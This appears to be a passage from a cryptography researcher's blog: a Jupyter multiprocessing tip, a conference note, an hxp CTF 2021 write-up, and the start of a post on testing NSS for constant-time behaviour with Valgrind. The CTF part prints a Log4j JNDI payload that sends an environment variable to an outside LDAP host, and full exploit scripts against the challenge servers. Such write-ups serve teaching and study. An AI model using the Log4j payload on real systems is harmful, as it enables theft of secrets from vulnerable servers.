Jupyter notebooks and multiprocessing - How to spawn and fork(server)

Today I came up with a clever solution for a dumb problem. When using multiprocessing or concurrent.futures in a Jupyter notebook, one is generally limited to the fork start method. This is because the spawn and forkserver methods require the target function to be defined in an importable module. If you are working with Jupyter notebooks, the target function very likely resides in the notebook itself, which is not importable. So, how do we make it importable?

Easy, we just get its source code, write it into a temporary file, add its directory to sys.path, and import it dynamically! The code below does all of that inside of a contextmanager.

import inspect
import tempfile
import sys

from contextlib import contextmanager
from importlib import import_module, invalidate_caches
from pathlib import Path


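@contextmanager
def enable_spawn(func):
    # Only the source of func itself is copied, not the rest of the notebook.
    source = inspect.getsource(func)
    with tempfile.NamedTemporaryFile(suffix=".py", mode="w") as f:
        f.write(source)
        f.flush()
        path = Path(f.name)
        directory = str(path.parent)
        sys.path.append(directory)
        try:
            # The file was just created, so make sure the import system notices it.
            invalidate_caches()
            module = import_module(path.stem)
            yield getattr(module, func.__name__)
        finally:
            # Restore sys.path even if the body of the with block raises.
            sys.path.remove(directory)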

Now for a demo of how it actually works. The main limitation is that only the source of the target function itself is written to the file, meaning that all of its imports have to be contained in the function body.

from concurrent.futures import ProcessPoolExecutor, as_completed
import multiprocessing

def target_func(arg):
    from math import sqrt
    return arg, sqrt(arg)

context = multiprocessing.get_context("spawn")
with ProcessPoolExecutor(max_workers=10, mp_context=context) as pool, enable_spawn(target_func) as target:
    futures = [pool.submit(target, i) for i in range(20)]
    for future in as_completed(futures):
        print(future.result())
(0, 0.0)
(1, 1.0)
(2, 1.4142135623730951)
(3, 1.7320508075688772)
(4, 2.0)
(5, 2.23606797749979)
(6, 2.449489742783178)
(7, 2.6457513110645907)
(8, 2.8284271247461903)
(9, 3.0)
(10, 3.1622776601683795)
(11, 3.3166247903554)
(12, 3.4641016151377544)
(14, 3.7416573867739413)
(15, 3.872983346207417)
(16, 4.0)
(17, 4.123105625617661)
(18, 4.242640687119285)
(19, 4.358898943540674)

Doing this might not always be a good idea, as spawn and forkserver behave differently from fork (for example, workers start from a fresh interpreter and do not inherit the notebook's state), so YMMV.
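
To make the import limitation mentioned above concrete, here is a minimal sketch that skips the process pool and only exercises the "write the source to a file and import it" step. The two source strings and the module names demo_working and demo_broken are made up for illustration; they stand in for what inspect.getsource would return for a notebook function.

```python
import importlib
import sys
import tempfile
from pathlib import Path

# Hypothetical function sources, standing in for inspect.getsource(func).
WORKING = '''
def target_func(arg):
    from math import sqrt  # the import lives inside the function
    return arg, sqrt(arg)
'''
BROKEN = '''
def target_func(arg):
    return arg, sqrt(arg)  # relies on a notebook-level "from math import sqrt"
'''


def load_from_source(source, module_name):
    """Write source to a temporary module, import it and return its target_func."""
    with tempfile.TemporaryDirectory() as directory:
        Path(directory, f"{module_name}.py").write_text(source)
        sys.path.insert(0, directory)
        try:
            importlib.invalidate_caches()
            module = importlib.import_module(module_name)
        finally:
            sys.path.remove(directory)
    return module.target_func


working = load_from_source(WORKING, "demo_working")
print(working(4))  # (4, 2.0)

broken = load_from_source(BROKEN, "demo_broken")
try:
    broken(4)
except NameError as error:
    # The notebook-level import never made it into the temporary module.
    print("NameError:", error)
```

The second function imports fine and only fails when called, which is also what a spawned worker would run into.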


Real World Crypto 2022 & IEEE SP 2022

I recently presented the paper “They’re not that hard to mitigate”: What Cryptographic Library Developers Think About Timing Attacks at Real World Crypto 2022 and IEEE Security & Privacy 2022. If you want more information on the paper, including a pre-print and additional material, check out its page. The RWC slides are available, as are the IEEE S&P slides.

Furthermore, the level of interest in the talk and in the tools for analysis of constant-time cryptographic code motivated me to start a GitHub page collecting these tools at crocs-muni.github.io/ct-tools/. I hope that in the future this page can host tutorials and guides on using these tools, crowdsourced from the community.

When I was in San Francisco for IEEE S&P I abused my jetlag and went for a very early walk around SF. I also took some photos.

Thanks a lot for the following photos from RWC 2022 to Benoit Viguier!


hxp ctf 2021

This year, we at the Crocs-Side-Scripting CTF team took part in the hxp CTF 2021. It was another demanding CTF with hard challenges. This post contains our solutions to the four challenges we solved (Log 4 sanity check, gipfel, kipferl and infinity) as well as a note on the solution to zipfel. We came in at a respectable 34th place, which was an improvement on last year's position. Hoping for top 20 next year!

Log 4 sanity check#

msc, 104 points

Just before the CTF we were discussing with the team whether there would be a challenge exploiting the recent log4j library vulnerabilities. When we saw it we were quite amused. Anyway, the solution to the challenge was quite simple. The flag was stored in an environment variable, which hinted at using the log4j exploit that does not achieve RCE but only environment variable exfiltration via an LDAP (or DNS, …) request. The payload was just the log4j exploit string pointing at this server and targeting the flag. However, we needed something on our side to actually detect the queried LDAP path containing the flag.

${jndi:ldap://neuromancer.sk/${env:FLAG}}

Simply listening on the LDAP port showed some communication from the vulnerable server, but the requested path is not sent in the first request, and without a proper LDAP server response the vulnerable service would not send it. We quickly set up the first LDAP server that we found, slapd, and bumbled around with its configuration for a bit to have it run and log. After checking the syslog, there it was!

Dec 17 16:43:31 Finn slapd[476096]: conn=1001 op=1 do_search: invalid dn: "hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}"

This challenge could have also been solved without the LDAP server, see here for example.

gipfel#

cry, 85 points

The first crypto challenge of this year was rather simple, a weird Diffie-Hellman type thing where not only the private key is private, but also the generator, which is randomly generated from a password every three runs.

def enc(a):
    f = {str: str.encode, int: int.__str__}.get(type(a))
    return enc(f(a)) if f else a

def H(*args):
    data = b'\0'.join(map(enc, args))
    return SHA256.new(data).digest()

def F(h, x):
    return pow(h, x, q)

password = random.randrange(10**6)

def go():
    g = int(H(password).hex(), 16)

    privA = 40*random.randrange(2**999)
    pubA = F(g, privA)
    print(f'{pubA = :#x}')

    pubB = int(input(),0)
    if not 1 < pubB < q:
        exit('nope')

    shared = F(pubB, privA)

    verA = F(g, shared**3)
    print(f'{verA = :#x}')

    verB = int(input(),0)
    if verB == F(g, shared**5):
        key = H(password, shared)
        flag = open('flag.txt').read().strip()
        aes = AES.new(key, AES.MODE_CTR, nonce=b'')
        print(f'flag:', aes.encrypt(flag.encode()).hex())
    else:
        print(f'nope! {shared:#x}')

signal.alarm(2021)
go()
go()
go()

I think we solved this challenge quite differently than other teams. We realized that after one run of the protocol in which the \(verB\) check fails, the server reveals the \(shared\) value it used. Together with \(verA\), this allows for constructing an offline oracle for testing guesses of the generator \(g\) and thus also of the password. The oracle is based on the equation: \[ verA = g^{shared^3} \bmod q\] which we can check for all password guesses once we have \(verA\) and \(shared\) from one go() run.

#!/usr/bin/env python3
# Requires pwntools, tqdm, pycryptodome
from pwn import *
from tqdm import tqdm
from Crypto.Hash import SHA256
from Crypto.Cipher import AES
from binascii import unhexlify

q = 0x3a05ce0b044dade60c9a52fb6a3035fc9117b307ca21ae1b6577fef7acd651c1f1c9c06a644fd82955694af6cd4e88f540010f2e8fdf037c769135dbe29bf16a154b62e614bb441f318a82ccd1e493ffa565e5ffd5a708251a50d145f3159a5

def enc(a):
    f = {str: str.encode, int: int.__str__}.get(type(a))
    return enc(f(a)) if f else a

def H(*args):
    data = b'\0'.join(map(enc, args))
    return SHA256.new(data).digest()

def F(h, x):
    return pow(h, x, q)

def solve_pow(server):
    pow_regex = re.compile(r"\"([0-9a-f]+)\"")
    bits_regex = re.compile("([0-9]+) zero")

    pow_line = server.recvline()
    pow_challenge = pow_regex.search(pow_line.decode()).groups()[0]
    pow_bits = bits_regex.search(pow_line.decode()).groups()[0]

    pow_proc = subprocess.run(["./pow-solver", pow_bits, pow_challenge], capture_output=True)
    pow_res = pow_proc.stdout.strip()

    server.sendline(pow_res)

def decrypt(password, shared, data):
    key = H(password, shared)
    aes = AES.new(key, AES.MODE_CTR, nonce=b'')
    return aes.decrypt(unhexlify(data))

if __name__ == "__main__":
    log.info("Precomputing gs")
    g_options = {}
    for pw in tqdm(range(10**6)):
        h = int(H(pw).hex(), 16)
        g_options[pw] = h

    server = remote("65.108.176.66", 1088)
    log.info("Solving PoW")
    solve_pow(server)
    log.success("Solved PoW")

    pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    server.sendline(b"2")

    verA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    server.sendline(b"2") # This will fail and we will get shared.

    shared = int(server.recvline().strip().decode().split("! ")[1], 16)
    exp = shared**3 % (q-1)

    for password, g in tqdm(g_options.items()):
        if verA == F(g, exp):
            break
    log.success(f"We got the g: {g}")
    log.success(f"We got the password: {password}")

    log.info("--- Second run ---")

    pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    privB = 10
    pubB = F(g, privB)
    server.sendline(str(pubB).encode())

    verA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    shared = F(pubA, privB)
    assert verA == F(g, shared**3)
    verB = F(g, shared**5)
    server.sendline(str(verB).encode())

    encrypted_flag = server.recvline().strip().decode().split(": ")[1]
    log.success(f"The flag is {decrypt(password, shared, encrypted_flag)}")

    server.close()

The code above gets the flag in the time limit, as it incorporates a simple speedup to reduce the \(shared^3\) exponent modulo \(q-1\).
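
The oracle and the exponent reduction can also be tried offline on a toy instance. The sketch below is not the challenge setup: it assumes a 127-bit Mersenne prime in place of the challenge prime, a password space of only 10**4 values, hashlib instead of pycryptodome, and made-up values for the secret password, privA and pubB.

```python
import hashlib

# Toy instance (assumptions): a 127-bit Mersenne prime stands in for the
# challenge prime q, and the password space is shrunk to 10**4 values.
q = 2**127 - 1
PASSWORD_SPACE = range(10**4)


def generator(password):
    """Derive g like the challenge does: SHA-256 of the decimal password string."""
    digest = hashlib.sha256(str(password).encode()).digest()
    return int.from_bytes(digest, "big")


def F(h, x):
    return pow(h, x, q)


# Simulated server side of one failed go() run, with made-up secret values.
secret_password = 4242
privA = 40 * 123456789
g = generator(secret_password)
shared = F(3, privA)      # we sent pubB = 3
verA = F(g, shared**3)    # printed by the server
# The server then prints shared because our verB guess was wrong.

# Attacker side: reduce the exponent once, then test every password offline.
# The reduction is valid because g**(q - 1) == 1 (mod q) when q does not divide g.
exp = shared**3 % (q - 1)
recovered = next(pw for pw in PASSWORD_SPACE if F(generator(pw), exp) == verA)
print("recovered password:", recovered)
```

Reducing the exponent once up front means every one of the password tests works with an exponent no larger than \(q\), instead of one three times as long.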

kipferl#

cry, 227 points

The kipferl challenge was very similar to gipfel with the only difference being that the finite field Diffie-Hellman was replaced with elliptic curve Diffie-Hellman over a weird curve over the same prime. We managed to solve it as the third fastest team, mainly due to our gipfel solution being different and more generic than the usual one. As our gipfel solution only used the group structure and the values \(verA\) and \(shared\), we could very quickly adapt it to also work on kipferl. There were a few twists though:

  • The generator \(G\) could now lie on the original curve or on its twist. This made the simple speedup of gipfel above slightly more tricky, as we needed to test where the generator guess is to reduce by the correct order.
  • The scalar multiplication operations as implemented in the challenge are quite slow, and we needed to run quite a lot of them in the time limit of 2021 seconds.

To address these issues, we precomputed the possible generators for all passwords together with information on whether they lay on the original curve or on the twist, and used parallelization for the rest. The script below precomputes the generator information in SageMath.

# Requires tqdm and pycryptodome
import json
from tqdm import tqdm
from Crypto.Hash import SHA256

q = 0x3a05ce0b044dade60c9a52fb6a3035fc9117b307ca21ae1b6577fef7acd651c1f1c9c06a644fd82955694af6cd4e88f540010f2e8fdf037c769135dbe29bf16a154b62e614bb441f318a82ccd1e493ffa565e5ffd5a708251a50d145f3159a5
K = GF(q)
a, b = K(1), K(0)

curve = EllipticCurve([a, b])

def enc(a):
    f = {str: str.encode, int: int.__str__}.get(type(a))
    return enc(f(a)) if f else a

def H(*args):
    data = b'\0'.join(map(enc, args))
    return SHA256.new(data).digest()

if __name__ == "__main__":
    print("Precomputing gs...")
    gs = {}
    for pw in tqdm(range(10**6)):
        g = int(H(pw).hex(), 16)
        try:
            curve.lift_x(K(g))
            mod = "orig"
        except ValueError:
            # lift_x raises ValueError when no point with this x-coordinate exists.
            mod = "twist"
        gs[pw] = {
            "g": g,
            "mod": mod
        }

    with open("gs.json", "w") as f:
        json.dump(gs, f)
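
The curve-or-twist decision in the script above can also be made without SageMath. The following is a minimal plain-Python sketch using Euler's criterion; the function name classify_x and the small prime are assumptions for illustration, only the curve shape \(a = 1, b = 0\) is taken from the challenge.

```python
def classify_x(x, a, b, p):
    """Return "orig" if x is the x-coordinate of a point on
    y^2 = x^3 + a*x + b over GF(p), and "twist" otherwise."""
    rhs = (x**3 + a * x + b) % p
    # Euler's criterion: a nonzero rhs is a square modulo an odd prime p
    # exactly when rhs**((p - 1) // 2) == 1 (mod p).
    if rhs == 0 or pow(rhs, (p - 1) // 2, p) == 1:
        return "orig"
    return "twist"


# Toy parameters (assumption): the challenge curve shape over a small prime.
p, a, b = 1019, 1, 0
counts = {"orig": 0, "twist": 0}
for x in range(p):
    counts[classify_x(x, a, b, p)] += 1
print(counts)
```

One modular exponentiation per candidate is all that is needed, as no square root has to be computed to know on which curve the x-coordinate lives.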

Next comes the actual attack script in Python. On the original curve we reduce the exponent by \(r\), the square root of the curve order, as the group structure is bi-cyclic (\(\mathbb{Z}_r \times \mathbb{Z}_r\)). With enough cores the script below gets the flag.

#!/usr/bin/env python3
from pwn import *
from Crypto.Hash import SHA256
from Crypto.Cipher import AES
from binascii import unhexlify
from multiprocessing import Pool
from tqdm import tqdm
import json

q = 0x3a05ce0b044dade60c9a52fb6a3035fc9117b307ca21ae1b6577fef7acd651c1f1c9c06a644fd82955694af6cd4e88f540010f2e8fdf037c769135dbe29bf16a154b62e614bb441f318a82ccd1e493ffa565e5ffd5a708251a50d145f3159a5
a, b = 1, 0
order_orig = 21992493417575896428286087521674334179336251497851906051131955410904158485314789427947788692030188502157019527331790513011401920585195969087140918256569620608732530453375717414098148438918130733211117668960801178110820764957628836
order_sqrt = 4689615487177589107664782585032558388794418913529425573939737788208931564987743250881967962324438559511711351322406
order_twist = 2 * q + 2 - order_orig

################################################################

# https://www.hyperelliptic.org/EFD/g1p/data/shortw/xz/ladder/ladd-2002-it
def xDBLADD(P,Q,PQ):
    (X1,Z1), (X2,Z2), (X3,Z3) = PQ, P, Q
    X4 = (X2**2-a*Z2**2)**2-8*b*X2*Z2**3
    Z4 = 4*(X2*Z2*(X2**2+a*Z2**2)+b*Z2**4)
    X5 = Z1*((X2*X3-a*Z2*Z3)**2-4*b*Z2*Z3*(X2*Z3+X3*Z2))
    Z5 = X1*(X2*Z3-X3*Z2)**2
    X4,Z4,X5,Z5 = (c%q for c in (X4,Z4,X5,Z5))
    return (X4,Z4), (X5,Z5)

def xMUL(P, k):
    Q,R = (1,0), P
    for i in reversed(range(k.bit_length()+1)):
        if k >> i & 1: R,Q = Q,R
        Q,R = xDBLADD(Q,R,P)
        if k >> i & 1: R,Q = Q,R
    return Q

################################################################

def enc(a):
    f = {str: str.encode, int: int.__str__}.get(type(a))
    return enc(f(a)) if f else a

def H(*args):
    data = b'\0'.join(map(enc, args))
    return SHA256.new(data).digest()

def F(h, x):
    r = xMUL((h,1), x)
    return r[0] * pow(r[1],-1,q) % q

def test_F(args):
    password, g, verA, exp = args
    out = F(g, exp)
    if verA == out:
        return True, password, g
    else:
        return False, password, g

def solve_pow(server):
    pow_regex = re.compile(r"\"([0-9a-f]+)\"")
    bits_regex = re.compile("([0-9]+) zero")

    pow_line = server.recvline()
    pow_challenge = pow_regex.search(pow_line.decode()).groups()[0]
    pow_bits = bits_regex.search(pow_line.decode()).groups()[0]

    pow_proc = subprocess.run(["./pow-solver", pow_bits, pow_challenge], capture_output=True)
    pow_res = pow_proc.stdout.strip()

    server.sendline(pow_res)

def decrypt(password, shared, data):
    key = H(password, shared)
    aes = AES.new(key, AES.MODE_CTR, nonce=b'')
    return aes.decrypt(unhexlify(data))

if __name__ == "__main__":
    log.info("Loading gs...")
    with open("gs.json") as f:
        gs = json.load(f)

    server = remote("65.108.176.252", 1099)
    log.info("Solving PoW")
    solve_pow(server)
    log.success("Solved PoW")

    pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    server.sendline(b"2")

    verA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    server.sendline(b"2") # This will fail and we will get shared.

    shared = int(server.recvline().strip().decode().split("! ")[1], 16)
    exp_orig = shared**3 % order_sqrt
    exp_twist = shared**3 % order_twist

    tasks = [(int(password), val["g"], verA, exp_orig if val["mod"] == "orig" else exp_twist) for password, val in gs.items()]

    pool = Pool()
    res = pool.imap_unordered(test_F, tasks)
    for r in tqdm(res, total=len(gs)):
        if r[0]:
            password = r[1]
            g = r[2]
            pool.terminate()
            pool.join()
            break
    else:
        log.error("No luck")
        exit(1)
    log.success(f"We got the g: {g}")
    log.success(f"We got the password: {password}")

    log.info("---- Second run ----")

    pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    privB = 10
    pubB = F(g, privB)

    server.sendline(str(pubB).encode())

    verA = int(server.recvline().strip().decode().split(" = ")[1], 16)

    shared = F(pubA, privB)
    assert verA == F(g, (shared**3))
    verB = F(g, (shared**5))

    server.sendline(str(verB).encode())

    encrypted_flag = server.recvline().strip().decode().split(": ")[1]
    log.success(f"The flag is {decrypt(password, shared, encrypted_flag)}")

    server.close()
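
The reduction by order_sqrt in the script above can be justified with a short derivation. It assumes the group structure stated earlier and writes \(\mathcal{O}\) for the point at infinity and \(E\) for the original curve, which is notation introduced here: \[ E(\mathbb{F}_q) \cong \mathbb{Z}_r \times \mathbb{Z}_r \;\Longrightarrow\; [r]P = \mathcal{O} \text{ for all } P \in E(\mathbb{F}_q) \;\Longrightarrow\; [n]P = [n \bmod r]P \] Taking \(n = shared^3\) gives the exp_orig value. For generators on the twist the script makes no assumption on the group structure and reduces by the full twist order instead.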

infinity#

cry, 500 points

This challenge presents a SageMath implementation of the CSIDH protocol that gives you 600 seconds of interaction in which you can query it up to 500 times but cannot send the same public key more than once.

#!/usr/bin/env sage
proof.all(False)

if sys.version_info.major < 3:
    print('nope nope nope nope | https://hxp.io/blog/72')
    exit(-2)

ls = list(prime_range(3,117))
p = 4 * prod(ls) - 1
base = bytes((int(p).bit_length() + 7) // 8)

R.<t> = GF(p)[]

def montgomery_coefficient(E):
    a,b = E.short_weierstrass_model().a_invariants()[-2:]
    r, = (t**3 + a*t + b).roots(multiplicities=False)
    s = sqrt(3*r**2 + a)
    return -3 * (-1)**is_square(s) * r / s

def csidh(pub, priv):
    assert type(pub) == bytes and len(pub) == len(base)
    E = EllipticCurve(GF(p), [0, int.from_bytes(pub,'big'), 0, 1, 0])
    assert (p+1) * E.random_point() == E(0)
    for es in ([max(0,+e) for e in priv], [max(0,-e) for e in priv]):
        while any(es):
            x = GF(p).random_element()
            try: P = E.lift_x(x)
            except ValueError: continue
            k = prod(l for l,e in zip(ls,es) if e)
            P *= (p+1) // k
            for i,(l,e) in enumerate(zip(ls,es)):
                if not e: continue
                k //= l
                phi = E.isogeny(k*P)
                E,P = phi.codomain(), phi(P)
                es[i] -= 1
        E = E.quadratic_twist()
    return int(montgomery_coefficient(E)).to_bytes(len(base),'big')

################################################################

randrange = __import__('random').SystemRandom().randrange
class CSIDH:
    def __init__(self):
        self.priv = [randrange(-2,+3) for _ in ls]
        self.pub = csidh(base, self.priv)
    def public(self): return self.pub
    def shared(self, other): return csidh(other, self.priv)

################################################################

alice = CSIDH()

__import__('signal').alarm(600)

from Crypto.Hash import SHA512
secret = ','.join(f'{e:+}' for e in alice.priv)
stream = SHA512.new(secret.encode()).digest()
flag = open('flag.txt','rb').read().strip()
assert len(flag) <= len(stream)
print('flag:', bytes(x^^y for x,y in zip(flag,stream)).hex())

seen = set()
for _ in range(500):
    bob = bytes.fromhex(input().strip())
    assert bob not in seen; seen.add(bob)
    print(alice.shared(bob).hex())

After some analysis of the CSIDH implementation we noticed that it is faulty. Occasionally (with probability \(1/l_i\)) it will fail to walk an isogeny of degree \(l_i\) during its isogeny walk. The secret exponents in this implementation are constrained to \(\{-2, -1, 0, 1, 2\}\). This means that if the exponent \(e_i\) is zero, the implementation can not fail to walk an \(l_i\)-degree isogeny as there is supposed to be no walk, if \(\lvert e_i \rvert = 1\) there is one chance for it to fail, if \(\lvert e_i \rvert = 2\) there are two chances for it to fail.
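
The failure probabilities described above can be written down exactly. This is a small sketch that assumes each step fails independently with probability \(1/l_i\); the function names and the short example key are made up for illustration.

```python
from fractions import Fraction
from math import prod


def step_failure_probability(l, e):
    """Probability that at least one of the |e| steps of degree l is skipped."""
    return 1 - (1 - Fraction(1, l)) ** abs(e)


def clean_run_probability(primes, exponents):
    """Probability that a whole walk finishes without any skipped step."""
    return prod((1 - Fraction(1, l)) ** abs(e) for l, e in zip(primes, exponents))


# Failure probabilities for the smallest and the largest prime of the challenge.
for e in (0, 1, 2):
    print(e, step_failure_probability(3, e), step_failure_probability(113, e))

# Hypothetical short private key over the first few primes.
primes = [3, 5, 7, 11]
exponents = [2, -1, 0, 1]
print(clean_run_probability(primes, exponents))  # 32/99
```

The gap between the \(\lvert e_i \rvert = 1\) and \(\lvert e_i \rvert = 2\) cases shrinks quickly for larger \(l_i\), so the coefficients of the large primes are the hardest ones to tell apart from a limited number of queries.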

We knew that we needed to use these different failure probabilities to get information on the private key, which would get us the flag. If we had Alice’s public key or could send the same public key more than once, we could detect when an error happened, as we could compare the returned shared secret with the expected one. However, we had no clear way to do that. What we thought of next sent us on a twisted and long detour where our solution almost worked, but not quite. Get it, twist-ed?

[Figure: Twist diagram]

We thought of using twists (shown in the diagram above as \(t\)) to let Alice walk back and forth between two “neighborhoods” of curves, one neighborhood close to the starting curve (can be \(E_0\) or really any curve) and one neighborhood close to her public key. We could then try to find a path between consecutive pairs of curves in each neighborhood using a meet-in-the-middle graph search algorithm. These paths would be the errors that Alice made during her two computations “there” and “back” (on the diagram above the paths are highlighted using colors). We would then aggregate these errors and use their relative frequencies to infer information about Alice’s private key.

[Figure: CSIDH base curve twist]

There were a couple of issues with this approach. First, the \(E_0\) curve is special with regard to twists, as twisting it jumps to the second component of the isogeny graph (we also thought that SageMath might have some issues computing a twist of this curve correctly). Looking back, it could actually be beneficial to use this fact: if the other graph component is somehow smaller, searching the neighborhoods would be easier. The other issue with this twisted approach is that you can only easily detect errors up to sign, and you will not detect the case when Alice makes the same error during both computations “there” and “back”. However, even with these issues our approach almost worked, and we spent a good part of a day looking at its partially good results and trying to figure out where exactly it was going wrong. There was a clear signal in the noise, as we detected when errors happened in our test runs, but after aggregating the errors we were not getting what we expected.

The idea to ditch the twists came on the last day of the CTF. We finally thought of a simpler way of creating our two neighborhoods of curves: give Alice the curve \(E_0\), then \([3]E_0\), \([5]E_0\), and so on, obtaining the curves \(A_0\), \(A_1\), \(A_2\), and then compute \([3^{-1}]A_1\) and so on to map the curves back to one neighborhood. What we got by mapping the curves back was essentially Alice’s public key with errors introduced by the faulty algorithm. We counted the unique curves in this mapped set and, given that the probability of no error occurring at all during the computation of the faulty algorithm was quite high, we could see that the curve that occurred most often was Alice’s true public key, without any errors. We could then run a meet-in-the-middle algorithm to find paths between this public key and the other mapped curves; these paths were the errors that Alice made during the computation. Compared to the twist approach, here we were getting all the errors correctly and even with the sign intact, as we were searching for paths between an error-less public key and a public key with errors (a single run of the faulty algorithm was involved, not two).

We then aggregated the errors (which matched the private key exactly on the smaller test instances we ran), but the resulting key did not give us the flag. We weren’t sure what had happened and tried to fix errors by hand in coefficients where the frequency of errors was the most “in-between” two expected frequencies given the private key coefficients. This proved tedious, but then we realized that we had Alice’s actual public key and could run one final meet-in-the-middle search between this public key and the public key obtained from our private key guess. This would fix the errors in the private key for us, and indeed it did!

hxp{1s0g3n1es__m0rE_L1k3__1_s0_G3n1u5}

zipfel#

cry, 714 points - did not solve

Although we did not manage to solve zipfel during the CTF, we had a pretty good idea of how to do it and even had a script computing the solution running as the CTF ended. zipfel is a continuation of kipferl in that the code is almost unchanged except for the omission of the \(verA\) value. Without this value our previous attacks no longer work, as even with the \(shared\) value we can’t create our oracle. However, it turned out there was another oracle. We could use the provided \(pubA\) public key and the Weil pairing to check our guesses of the generator \(G\). We looked at zipfel quite late, only after solving infinity late on the last day, and there was simply no time to compute this given the rather slow pairing computation in SageMath on that curve.


Testing constant-timeness using Valgrind: case of the NSS library

Cryptographic code needs to be constant-time to not leak secrets via timing. Being constant-time is usually defined as:

  • No branching on secret-dependent values.
  • No memory access based on secret-dependent values.
  • No secret-dependent values passed to variable-time functions.
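
As a small illustration of the first rule, here are two ways to compare byte strings. This is only a sketch of the coding pattern: Python itself gives no timing guarantees, and the function names are made up. For real code the standard library offers hmac.compare_digest.

```python
import hmac


def leaky_equal(a: bytes, b: bytes) -> bool:
    """Early-exit comparison: the running time depends on the first differing byte."""
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:  # branch on secret-dependent data
            return False
    return True


def branchless_equal(a: bytes, b: bytes) -> bool:
    """Accumulate all differences and inspect the secret-dependent result only once."""
    if len(a) != len(b):  # lengths are assumed to be public
        return False
    diff = 0
    for x, y in zip(a, b):
        diff |= x ^ y
    return diff == 0


tag = bytes(range(16))
forged = bytes(range(15)) + b"\xff"
print(leaky_equal(tag, forged), branchless_equal(tag, forged))
print(hmac.compare_digest(tag, tag))
```

Both functions return the same answers; they differ only in how the work they do depends on the secret inputs.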

There are a few ways of testing or verifying that code is constant-time, for example using the tools I described in a previous post. In this post I looked at using Valgrind’s memcheck tool to test constant-timeness of primitives in the NSS cryptographic library.

Testing constant-timeness using Valgrind#

As far as I know, the original idea of using Valgrind’s MemCheck for testing constant-timeness goes back to Adam Langley’s ctgrind, introduced in a blog post and on GitHub back in 2010. Older versions of Valgrind did not expose the necessary interface, so a patch was needed. No patches are needed for current versions of Valgrind. A modern presentation of the idea is Timecop.

The idea is to use Valgrind MemCheck’s memory definedness tracking as a sort of dynamic data dependency tracker that reports issues when data derived from undefined data is branched upon or is used for memory access.

First you write a test-wrapper for the function you want to test, which in this case is the compute function below. Then in the wrapper you mark all of the secrets as undefined using Valgrind’s client_request feature. The macros VALGRIND_MAKE_MEM_UNDEFINED(addr, len) and VALGRIND_MAKE_MEM_DEFINED(addr, len) are available from <valgrind/memcheck.h>.

#include <valgrind/memcheck.h>

int compute(unsigned char secret[32]) {
    if (secret[0] == 0) {
        return 0;
    } else {
        return 1;
    }
}

int main(void) {
    unsigned char buf[32];
    for (int i = 0; i < 32; ++i)
        buf[i] = 0;
    VALGRIND_MAKE_MEM_UNDEFINED(buf, 32);
    compute(buf);
    return 0;
}

Then when you run valgrind on the produced binary you get:

Conditional jump or move depends on uninitialised value(s)
        at 0x1093BC: compute (code.c:4)
        by 0x109464: main (code.c:16)

This shows that Valgrind’s MemCheck correctly detected the branching on secret values present in the compute function.
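
The underlying idea can be mimicked in a few lines of Python. The toy model below is not how Valgrind is implemented (MemCheck tracks definedness per bit, on the machine-code level); the Tracked class and the UndefinedUse exception are made up for illustration. Values carry a "defined" flag that propagates through arithmetic, and a report is raised only when an undefined value decides a branch or is used as an index.

```python
import operator


class UndefinedUse(Exception):
    """Raised where this toy model would report a use of an undefined value."""


class Tracked:
    def __init__(self, value, defined=True):
        self.value = value
        self.defined = defined

    def _binary(self, other, op):
        if not isinstance(other, Tracked):
            other = Tracked(other)
        # The result is defined only if both inputs are defined.
        return Tracked(op(self.value, other.value), self.defined and other.defined)

    def __xor__(self, other):
        return self._binary(other, operator.xor)

    def __eq__(self, other):
        return self._binary(other, operator.eq)

    def __bool__(self):  # called when the value decides a branch
        if not self.defined:
            raise UndefinedUse("conditional jump depends on undefined value")
        return bool(self.value)

    def __index__(self):  # called when the value is used as a list index
        if not self.defined:
            raise UndefinedUse("memory access depends on undefined value")
        return int(self.value)


def compute(secret):
    if secret[0] == 0:
        return 0
    return 1


def report(action):
    try:
        action()
        return None
    except UndefinedUse as error:
        return str(error)


secret = [Tracked(0, defined=False)] * 32  # analogous to VALGRIND_MAKE_MEM_UNDEFINED
table = list(range(256))
print(report(lambda: compute(secret)))    # branch on the secret is reported
print(report(lambda: table[secret[0]]))   # secret-dependent lookup is reported
print(report(lambda: secret[0] ^ 0xFF))   # plain arithmetic on the secret is fine
```

As in the real tool, merely computing with secret data is allowed; only letting it influence control flow or addresses triggers a report.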

Properties & Limitations#

This method of testing constant-timeness has some limitations. It is a runtime technique, so only code that gets executed gets tested. Getting good code coverage is thus important. Valgrind MemCheck’s checking machinery is also complex, and there is no guarantee that it is itself correctly implemented or that it has no false negatives or false positives. This is however the case with all software, and by doing any sort of tool-assisted analysis one has to include the tool in the trusted computing base and assume that it works.

Testing the Mozilla NSS library#

I started this work with the goal of trying out this technique of testing constant-timeness on a real-world library and also with the goal of upstreaming the changes to the library's CI.

Working with NSS created quite a bit of hassle. It uses Mercurial for version control. I had never used Mercurial before and some of its concepts looked completely backwards to my git-familiar brain. Also, setting up and understanding the bazillion Mozilla services necessary to submit patches to NSS was quite involved.

Integrating annotations#

I decided to focus on testing constant-timeness of the cryptographic primitives in NSS first. Timing attacks often focus on these primitives, but some focus on higher level constructions in TLS (like Lucky13) so larger parts of the TLS stack should be tested. To use Valgrind to test constant-timeness of crypto primitives one needs to write test-cases which execute the primitives on secret inputs marked undefined. Luckily, NSS already has test-cases for many of its primitives in the bltest and fbectest binaries, so I added the Valgrind annotations to those and pushed the revision.

I only annotated private keys and random nonces as secret values. I decided to not annotate inputs to hash functions and messages in encryption functions, even though these are also often meant to be secret (e.g. when hashing a secret to produce a key, or when encrypting a secret message, duh).

Testing constant-timeness#

To actually run the test-cases in CI, a test suite was necessary. I decided to copy the cipher test suite, which runs the bltest binary as usual, and create a new test suite ct which does the same but under Valgrind’s memcheck (revision). I also added tests using Valgrind on the fbectest binary, which performs ECDH.

Results#

I collected data while running on a machine with AMD Ryzen 7 PRO 4750U, using Valgrind 3.17.0 and gcc 11.1.0 on a Debug build of NSS targeting x86_64 based on revision ea6fb7d0d0fc. The test process reported AES-NI, PCLMUL, SHA, AVX, AVX2, SSSE3, SSE4.1, SSE4.2 all supported.

AES-GCM decryption#

The first report from Valgrind was for AES-GCM decryption:

